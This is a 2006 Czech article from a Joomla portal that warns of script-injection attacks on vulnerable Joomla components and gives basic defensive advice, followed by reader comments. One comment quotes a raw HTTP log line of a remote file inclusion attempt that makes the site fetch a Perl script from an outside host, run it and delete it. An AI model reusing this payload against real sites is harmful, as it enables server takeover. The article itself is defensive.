Právě prohlížíte: Úvod Články Novinky Příklad úspěšného hacku Joomla

26.
července
2006
Příklad úspěšného hacku Joomla Tisk Email
Napsal Karel Neugebauer jr. - itx.cz   

Poslední dobou se začínají množit úspěšné útoky na weby provozované redakčním systémem Joomla. V prvé řadě je třeba poznamenat, že na čistou a správně nainstalovanou verzi 1.0.10 zatím žádný úspěšný útok evidován nemám. Jak to tedy je?

Většina útoků je vedena skrz script injection (vložení cizího kódu) a dá se aplikovat na špatně napsané komponenty. Jako příklad uvádím komunitou nejvíce diskutované:

  • RS Gallery
  • Simpleboard (Joomlaboard)
  • ExtCalendar 

Na poslední dvě jmenované komponenty jsme zaznamenali v posledním týdnu více pokusů. Pokaždé byl pro injection (vložení) použit script c99shell. Z http logu je možno vypozorovat, jak hackeři při pokusu postupovali.

http log útoku na ExtCalendar

http log útoku na Simpleboard 

Hackeři pomoci úspěšného útok dostanou absolutní kontrolu nad Vaším webem. Nastavení readonly práv na soubory Vám nepomůže.

Celkově lze shrnout, že systém útoků je poměrně jednoduchý a není k němu třeba být security guru. Obrana spočívá v ustavičném sledování webových stránek a diskuzních fór jak samotného CMS Joomla, tak Vámi používaných komponent. V případě jakýchkoliv pochybností o zranitelnosti je třeba inkriminované komponenty stáhnout či nahradit lépe napsanou alternativou. Nastavení práv pouze pro čtení na configuration.php (a ostatní soubory) by asi mělo být standardem, i když takováto ochrana je v případě úspěšného injection pravděpodobně neúčinná.

Bohužel i tak budou vždy hackeři krok před Vámi a jediné, co Vám může pomoci stoprocentně, je kvalitní zálohování.

Komentáře (34)
  • |11.09.2006 11:38:32 fallnet  - PerForms 1.0
    Na jednom starsim webu jsem zapomnel updatovat PerForms 1.0 a taktez mi byla tato komponenta hacknuta. Nastesti ale nedoslo ke smazani celeho webu, ale pouze prepsani souboru performs.php :upset takze neusnout na vavrinech...
  • |10.09.2006 16:50:26 cloud  - Jak ji naistalovat
    Vim ze sem asi tupec, ale furt nemuzu prijit na to jak naistalovat joomla.Vsichni pisou ze mam poslat na server slozku www.' ale takovou tam nemam...
  • |27.08.2006 18:21:24 filbar  - Remository 3.20
    Tak jsem se dověděl, že Remository ve verzi 3.20 je náchylná k útoku, proto všichni, kdo jí používají, by měli co nejdříve aktualizovat na nejnovější verzi.
  • |23.08.2006 08:53:49 Aramon
    No tak už jsem to schytal taky... potřetí za posledních 14 dní... S podivem ale je, že naposledy to byla čistá joomla, obsah webu kompletně smazán (soubory,adresáře)...jen podstrčený index s dost hnusnýma fotkama...
  • |21.08.2006 10:16:51 Enyoj  - Tak už jsem tam taky :-(
    Hack se dostal i k nám do Hradce Králové
    tady :upset
  • |15.08.2006 23:16:01 zfajfr  - Zkušenosti s hackem Joomla 1.0.10
    Tak jsem to taky zažil na vlastní kůži. Všechny mé weby v Joomla v posl. verzi byly hacknuty - záměna všech souborů typu index.php, index.html apod. hackerovým obsahem, rekurzivní výmaz všech souborů s řetězcem "*log*" v názvu, tj. např. i /var/www/log - no prostě veselo ....
    S nejvyšší pravděpodobností šlo o výše zmíněný postup zvaný PHP injection na některou z potenciálně nebezpečných (tj. děravých) komponent. Jako nejpravděpodobnější se mi jeví com_remository, com_bsqsitestats, com_events, com_joomlaboard, com_pollxt (ve starších verzích)...
    Ale v logu je taky spousta záznamů o útocích na com_content, jako např. 203.113.132.116 - - [15/Aug/2006:20:57:24 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mo
    sConfig_absolute_path=http://www.rtvpix.com/tool.gif?&cmd=cd%20/tmp/;w get%20http://www.rtvpix.com/mambo.txt;perl%20mambo.txt
    ;rm%20-rf%20mambo.*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
    Nevím přesně jak se ke mě d...
  • |14.08.2006 16:45:06 pitbull  - dodatek
    Jo jeste prosimte upresni na co ses nastvanej :o) To by me zajimalo predevsim. Taky by si mohl uvest co si v oboru dokazal, kdyz mas plnou hubu pripominek, jak nekdo neco nezvladl :o) Sedet s jednim prstem v prdeli, druhym v nose a kritizovat umi kazdej :o) A nutno uznat, ze ty v tom excelujes :o)
  • |14.08.2006 16:33:53 pitbull
    mily xmiro jako obvykle kecas nesmysly :o) Muzes upresnit v jakem rozsahu mas na mysli? osm dni po jakem funusu? Tvem? :o)
  • |14.08.2006 16:20:50 xmira  - nastvanej
    a jestli se Vam zdam nastvanej, tak ano. Jsem. Pripominam jen to, co si MP.cz si vzal jako velke sousto a zatim ta ofiko podpora moc nefrci :zzz
  • |14.08.2006 16:19:11 xmira  - hacky
    mily pitbule, hacky na mamba v takovemdle rozsahu uz probihaji cca mesic. To ze tu visi clanek 8 dni po funusu je pozde. Napsal jsem objektivne jak vidim jak to tu funguje. Tak sorry, mas hodne pismen navazeni do me, ale ze bys napsal neco vice videt neni.
Komentář mohou přidat pouze registrovaní uživatelé!
< Předchozí   Další >
 
Právě připojeni - hostů: 423 a členů: 4 
Joomla!® je registrovaná ochranná známka společnosti Open Source Matters
© 2004-2010 JoomlaPortal.cz - provozováno Testudo corp. s.r.o.
design by VirtueArt geared by Joomla! Doporučujeme iTrefa.cz

Partneři Joomlaportal.cz

IgnumPhoca GalerieVirtueMart

Reklama Joomlaportal.cz

Artio

RSS zdroje Joomlaportal.cz

Diskuze Joomla
Sekce ke stažení
Novinky na webu

Joomla! Developer - Vulnerability News

[20100704] - Core - XSS Vulnerabillitis in Back End